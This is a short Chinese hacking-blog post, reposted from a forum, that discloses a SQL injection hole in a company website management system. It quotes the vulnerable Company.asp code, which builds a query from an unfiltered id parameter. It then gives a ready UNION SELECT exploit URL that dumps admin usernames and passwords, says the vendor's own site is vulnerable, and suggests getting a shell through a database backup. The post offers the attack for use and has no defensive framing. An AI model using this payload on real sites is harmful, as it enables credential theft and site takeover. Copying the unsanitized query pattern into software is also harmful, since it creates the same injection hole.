当前位置: iick's blog > 网站漏洞 > 企成电气公司企业网站管理系统漏洞

企成电气公司企业网站管理系统漏洞

作者:hack1990 时间:12-03-04 阅读数:537人阅读

文件:Company.asp

<%
ID=trim(request.QueryString("id"))
if ID="" then ID=1
set Rs = server.createobject("adodb.recordset")
Rs.source = "select * from Company where ID="&ID&""
Rs.open Rs.source,conn,1,3
if Rs.eof then
   Content="还没有添加相关内容!"
else
   Kig=Rs("Kig")
   Rs("kig")=Kig+1
   Rs.update
   Content=Rs("Content")
   ComName=Rs("ComName")
end if
Rs.close
set Rs=nothing
%>什么都没过滤。。

exp:

Company.asp?id=2 union select 1,username,password,4,5,6,7,8 from Nwebadmin

官网也存在。。

备份数据库可以拿到shell。

 

转自:http://www.90sec.org/thread-1640-1-1.html

 

# Nmap Security Scanner 7.0

上一篇:aspcms EXP 批量型

下一篇:一夜情作战攻略

相关文章

评论列表

发表评论